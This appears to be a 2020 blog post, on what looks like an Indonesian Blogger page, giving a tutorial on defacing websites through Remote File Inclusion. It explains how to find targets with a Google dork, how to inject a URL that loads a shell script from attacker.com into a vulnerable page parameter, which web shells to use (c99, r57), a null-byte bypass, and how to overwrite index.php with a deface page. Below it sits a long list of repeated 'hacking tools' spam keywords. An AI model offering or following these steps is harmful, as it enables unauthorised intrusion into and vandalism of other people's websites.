Selamat Datang

home page statistics
Disney Vacation Package

Sabtu, 29 Agustus 2020

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related news
  1. Hacking Tools
  2. Physical Pentest Tools
  3. Pentest Tools Bluekeep
  4. How To Make Hacking Tools
  5. Pentest Tools Github
  6. Pentest Box Tools Download
  7. Pentest Tools For Ubuntu
  8. Hack Tools
  9. Hacking Tools For Beginners
  10. What Is Hacking Tools
  11. Top Pentest Tools
  12. Install Pentest Tools Ubuntu
  13. Hacker Tools Hardware
  14. Pentest Tools For Mac
  15. Wifi Hacker Tools For Windows
  16. Hacking Tools 2020
  17. Pentest Tools Subdomain
  18. Hacking Tools Mac
  19. Pentest Automation Tools
  20. Tools Used For Hacking
  21. Pentest Tools Kali Linux
  22. Pentest Tools Bluekeep
  23. Pentest Tools Nmap
  24. Hacking Apps
  25. Pentest Tools Website
  26. Hacking Tools Online
  27. Hacking Tools For Kali Linux
  28. Hack Tools Pc
  29. Hak5 Tools
  30. Pentest Tools Kali Linux
  31. Hacks And Tools
  32. Hacking Tools Pc
  33. Hack Tools For Ubuntu
  34. Ethical Hacker Tools
  35. Pentest Tools Tcp Port Scanner
  36. Best Pentesting Tools 2018
  37. Hacking Tools 2019
  38. Pentest Tools Port Scanner
  39. Hacker Tool Kit
  40. Hacker Tools
  41. Growth Hacker Tools
  42. Pentest Tools Nmap
  43. Hacker Tools 2020
  44. Hacking Tools Online
  45. Hack Tools Github
  46. Hacking Tools Mac
  47. Pentest Tools Download
  48. How To Install Pentest Tools In Ubuntu
  49. Hacker Tools Linux
  50. Hacking Tools Windows 10
  51. Hack Tools
  52. New Hack Tools
  53. Pentest Tools Online
  54. Hacking App
  55. Hacker Tools Apk
  56. Pentest Tools Download
  57. Hacking Tools For Games
  58. Hacking Tools For Kali Linux
  59. Hacker Tools Software
  60. How To Install Pentest Tools In Ubuntu
  61. Hacking Tools For Windows 7
  62. New Hack Tools
  63. Hack Tools Download
  64. Pentest Tools Apk
  65. Pentest Tools Free
  66. Wifi Hacker Tools For Windows
  67. Hacking Tools Kit
  68. Pentest Tools Framework
  69. Hacking Tools For Pc
  70. Pentest Recon Tools
  71. Pentest Tools Bluekeep
  72. Hacking Apps
  73. Usb Pentest Tools
  74. Pentest Tools Website
  75. Hacker Tools Hardware
  76. Hackers Toolbox
  77. Termux Hacking Tools 2019
  78. Hack Tools Github
  79. Hacking Tools For Windows Free Download
  80. Install Pentest Tools Ubuntu
  81. Pentest Tools Bluekeep
  82. Hacker Tools Free Download
  83. Hacking Tools For Windows
  84. Pentest Tools Nmap
  85. Pentest Tools
  86. Pentest Tools Subdomain
  87. New Hack Tools
  88. Hacking Tools Github
  89. Hack Tools Online
  90. Free Pentest Tools For Windows
  91. Pentest Tools Review
  92. Pentest Tools Subdomain
  93. Pentest Tools Android
  94. Hacking Tools Online
  95. Hacker Tools Free
  96. How To Hack
  97. Physical Pentest Tools
  98. Computer Hacker
  99. Hacking Tools Usb
  100. Android Hack Tools Github
  101. Hacking Tools For Mac
  102. Hack Rom Tools
  103. Nsa Hack Tools
  104. Best Pentesting Tools 2018
Diposting oleh suhaimidewis di Sabtu, Agustus 29, 2020

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)